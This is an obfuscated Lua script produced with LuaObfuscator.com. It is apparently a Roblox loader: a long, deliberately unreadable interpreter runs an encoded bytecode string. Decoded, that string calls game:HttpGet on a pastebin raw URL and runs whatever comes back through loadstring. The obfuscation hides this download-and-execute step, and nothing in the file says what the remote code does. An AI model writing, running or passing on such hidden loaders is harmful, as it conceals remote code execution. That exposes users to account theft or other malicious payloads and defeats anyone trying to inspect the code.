--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v30,16));if v19 then local v127=0;local v128;while true do if (v127==1) then return v128;end if (v127==0) then v128=v5(v86,v19);v19=nil;v127=1;end end else return v86;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((2192 -(1523 + 114)) + 64)))) + (932 -(857 + 74)))) ;return v87-(v87%(569 -(367 + 201))) ;else local v88=(929 -(193 + 21 + 713))^(v32-(1 + 0)) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * 256) + v35 ;end local function v23() local v37=(2347 -1077) -(226 + 1044) ;local v38;local v39;local v40;local v41;while true do if (v37==(0 -(0 -0))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;v37=118 -(32 + 85) ;end if (v37==((351 -(87 + 263)) + 0)) then return (v41 * (3720433 + 13056783)) + (v40 * (66493 -(892 + 65))) + (v39 * (610 -354)) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1,4 + 16 ) * ((2 + 0)^(32 + 0))) + v42 ;local v46=v20(v43,51 -30 ,2 + 21 + 8 );local v47=((v20(v43,50 -(10 + 8) )==1) and  -(3 -(7 -5))) or (443 -(416 + 26)) ;if (v46==((337 + 615) -(802 + 150))) then if (v45==(0 -0)) then return v47 * (0 -0) ;else local v116=438 -(145 + 293) ;while true do if (v116==(430 -(44 + (1271 -(261 + 624))))) then v46=1 + 0 ;v44=997 -(915 + 82) ;break;end end end elseif (v46==((10299 -4503) -(13312 -9563))) then return ((v45==(772 -(201 + 571))) and (v47 * ((1 + 0)/((1080 -(1020 + 60)) -(859 -(814 + 45)))))) or (v47 * NaN) ;end return v8(v47,v46-((5445 -3235) -(1069 + 118)) ) * (v44 + (v45/((1425 -(630 + 793))^(117 -65)))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;v49=1057 -((141 -54) + 968) ;end if (v49==(13 -10)) then return v6(v51);end if (v49==(0 + 0 + 0)) then v50=nil;if  not v48 then local v123=(0 -0) -0 ;while true do if (v123==(1747 -(760 + 987))) then v48=v23();if (v48==(1913 -(1789 + 124))) then return "";end break;end end end v49=2 -1 ;end if (v49==(768 -(745 + 21))) then v51={};for v117=(15 -(9 + 5)) + (376 -(85 + 291)) , #v50 do v51[v117]=v2(v1(v3(v50,v117,v117)));end v49=7 -4 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 0 + 0 ;end)();local v90=(function() return;end)();local v92=(function() return;end)();while true do if (v89~=(1024 -(706 + 318))) then else local v124=(function() return 0;end)();local v125=(function() return;end)();while true do if (v124~=0) then else v125=(function() return 0;end)();while true do if (v125~=(1 + 0)) then else v89=(function() return  #"/";end)();break;end if (v125==0) then v90=(function() return v91();end)();v92=(function() return nil;end)();v125=(function() return 1 + 0 ;end)();end end break;end end end if (v89== #"\\") then if (v90== #".") then v92=(function() return v91()~=0 ;end)();elseif (v90==(2 + 0)) then v92=(function() return v93();end)();elseif (v90== #"91(") then v92=(function() return v94();end)();end v95[v96]=(function() return v92;end)();break;end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v53=(function() return function(v97,v98,v99,v100,v101,v102,v103,v104,v105) local v106=(function() return 0 -0 ;end)();local v97=(function() return;end)();local v98=(function() return;end)();while true do local v115=(function() return 0;end)();while true do if (v115==(0 -0)) then if (v106==(701 -(271 + 429))) then local v129=(function() return 0 + 0 ;end)();while true do if (v129~=(1636 -(1373 + 263))) then else while true do if (v97==(1500 -(1408 + 92))) then v98=(function() return v99();end)();if (v100(v98, #"|", #".")~=0) then else local v179=(function() return 1000 -(451 + 549) ;end)();local v180=(function() return;end)();local v181=(function() return;end)();local v182=(function() return;end)();while true do if ((1290 -(993 + 295))~=v179) then else if (v100(v181, #"|", #"\\")== #"[") then v182[1 + 1 ]=(function() return v103[v182[1 + 1 ]];end)();end if (v100(v181,2 -0 ,2 -0 )== #"]") then v182[ #"-19"]=(function() return v103[v182[ #"xxx"]];end)();end v179=(function() return 1387 -(746 + 638) ;end)();end if ((1 + 2)~=v179) then else if (v100(v181, #"xnx", #"-19")== #"]") then v182[ #"asd1"]=(function() return v103[v182[ #"http"]];end)();end v104[v105]=(function() return v182;end)();break;end if (v179==0) then local v185=(function() return 0 + 0 ;end)();while true do if ((1 + 0)~=v185) then else v179=(function() return 1 -0 ;end)();break;end if (0==v185) then v180=(function() return v100(v98,2, #"91(");end)();v181=(function() return v100(v98, #"xnxx",1775 -(1749 + 20) );end)();v185=(function() return 342 -(218 + 123) ;end)();end end end if (v179~=(1582 -(1535 + 46))) then else v182=(function() return {v101(),v101(),nil,nil};end)();if (v180==(0 + 0)) then local v189=(function() return 1145 -(466 + 679) ;end)();local v190=(function() return;end)();while true do if (v189==(0 -0)) then v190=(function() return 0 + 0 ;end)();while true do if (v190==(0 -0)) then v182[ #"-19"]=(function() return v101();end)();v182[ #"?id="]=(function() return v101();end)();break;end end break;end end elseif (v180== #".") then v182[ #"gha"]=(function() return v102();end)();elseif (v180==(1 + 1)) then v182[ #"nil"]=(function() return v102() -((1 + 1)^(576 -(306 + 254))) ;end)();elseif (v180== #"91(") then local v195=(function() return 0;end)();local v196=(function() return;end)();while true do if (v195==(0 + 0)) then v196=(function() return 0 -0 ;end)();while true do if (v196~=(0 + 0)) then else v182[ #"nil"]=(function() return v102() -((3 -1)^(1483 -(899 + 568))) ;end)();v182[ #"0313"]=(function() return v101();end)();break;end end break;end end end v179=(function() return 2 + 0 ;end)();end end end break;end end return v97,v98,v99,v100,v101,v102,v103,v104,v105;end end end if (v106==(1427 -(41 + 1386))) then local v130=(function() return 0 -0 ;end)();while true do if (v130==1) then v106=(function() return 604 -(268 + 335) ;end)();break;end if (v130==(0 + 0)) then v97=(function() return 0;end)();v98=(function() return nil;end)();v130=(function() return 291 -(60 + 230) ;end)();end end end break;end end end end;end)();local v54=(function() return function(v107,v108,v109) local v110=(function() return 572 -(426 + 146) ;end)();local v111=(function() return;end)();while true do if (0==v110) then v111=(function() return 0;end)();while true do if (v111==(166 -(122 + 44))) then local v131=(function() return 0 -0 ;end)();local v132=(function() return;end)();while true do if (v131~=(0 -0)) then else v132=(function() return 0 + 0 ;end)();while true do if (v132==(0 + 0)) then local v173=(function() return 1456 -(282 + 1174) ;end)();while true do if (v173~=(811 -(569 + 242))) then else v107[v108-#" " ]=(function() return v109();end)();return v107,v108,v109;end end end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"<",v59 do FlatIdent_25011,Type,v21,Cons,v24,v25,v60,v68=(function() return v52(FlatIdent_25011,Type,v21,Cons,v24,v25,v60,v68);end)();end v58[ #"nil"]=(function() return v21();end)();for v69= #"<",v23() do FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v60,v55,v69=(function() return v53(FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v60,v55,v69);end)();end for v70= #"/",v23() do v56,v70,v28=(function() return v54(v56,v70,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[67 -(23 + 7 + 35) ];local v67=v62[3 + 0 ];return function(...) local v71=v65;local v72=v66;local v73=v67;local v74=v27;local v75=1258 -(1043 + 214) ;local v76= -(3 -2);local v77={};local v78={...};local v79=v12("#",...) -(2 -1) ;local v80={};local v81={};for v112=580 -(154 + 207 + 219) ,v79 do if ((v112>=v73) or (55==2387)) then v77[v112-v73 ]=v78[v112 + 1 ];else v81[v112]=v78[v112 + (321 -(53 + 267)) ];end end local v82=(v79-v73) + 1 + (1504 -(363 + 1141)) ;local v83;local v84;while true do v83=v71[v75];v84=v83[414 -(15 + 398) ];if ((1454<2491) and (v84<=(989 -(18 + 964)))) then if (v84<=(11 -8)) then if ((v84<=((1581 -(1183 + 397)) + 0)) or (4157<=2803)) then if (v84>(0 + 0)) then local v133=v83[5 -3 ];local v134=v81[v83[853 -(20 + 830) ]];v81[v133 + 1 + 0 ]=v134;v81[v133]=v134[v83[130 -(116 + 10) ]];else v81[v83[2]]=v64[v83[1 + 2 ]];end elseif ((4853>=2982) and (v84==(740 -(542 + 196)))) then v81[v83[3 -(1 + 0) ]]=v83[1 + 2 ];else v81[v83[2 + 0 ]]();end elseif (v84<=(2 + 3)) then if ((4134>3357) and (v84==(10 -6))) then v81[v83[4 -(2 + 0) ]]={};else do return;end end elseif (v84>((3532 -(1913 + 62)) -(1126 + 425))) then v81[v83[407 -(118 + 287) ]]=v64[v83[3]];else v81[v83[2]]={};end elseif ((v84<=(43 -32)) or (3417<2534)) then if (v84<=(1130 -(118 + 1003))) then if ((v84==8) or (2722<=164)) then local v146=v83[5 -(2 + 1) ];local v147,v148=v74(v81[v146](v13(v81,v146 + 1 ,v83[380 -(142 + 235) ])));v76=(v148 + v146) -(4 -3) ;local v149=0 + 0 ;for v166=v146,v76 do local v167=0;while true do if ((v167==(977 -(553 + 424))) or (2408<2109)) then v149=v149 + (1 -0) ;v81[v166]=v147[v149];break;end end end else local v150=v83[2 + 0 ];local v151=v81[v83[3 + 0 ]];v81[v150 + 1 + 0 ]=v151;v81[v150]=v151[v83[2 + 2 ]];end elseif (v84>((15 -9) + 4)) then do return;end else v81[v83[4 -2 ]]();end elseif ((v84<=13) or (33==1455)) then if (v84>(33 -21)) then local v155=0;local v156;local v157;local v158;local v159;while true do if (v155==(2 -1)) then v76=(v158 + v156) -(1 + 0) ;v159=0 -0 ;v155=755 -(239 + 514) ;end if (v155==(1 + 1)) then for v176=v156,v76 do v159=v159 + (1330 -(797 + 532)) ;v81[v176]=v157[v159];end break;end if ((v155==(0 + 0)) or (443>=4015)) then v156=v83[1 + 1 ];v157,v158=v74(v81[v156](v13(v81,v156 + (2 -(1934 -(565 + 1368))) ,v83[3])));v155=1203 -(373 + 829) ;end end else v81[v83[7 -5 ]]=v83[734 -(476 + 255) ];end elseif (v84>14) then local v162=1130 -(369 + (2422 -(1477 + 184))) ;local v163;while true do if (v162==((0 -0) + 0 + 0)) then v163=v83[2 -0 ];v81[v163]=v81[v163](v13(v81,v163 + (1 -0) ,v76));break;end end else local v164=238 -(64 + 174) ;local v165;while true do if (v164==(0 + (856 -(564 + 292)))) then v165=v83[2 -0 ];v81[v165]=v81[v165](v13(v81,v165 + ((581 -244) -(144 + 192)) ,v76));break;end end end v75=v75 + (217 -(42 + 174)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F4E4234307648595400094Q00067Q00122Q000100013Q00122Q000200023Q002001000200020003001202000400044Q000D000200044Q000F00013Q00022Q00030001000100012Q000B3Q00017Q00",v9(),...);
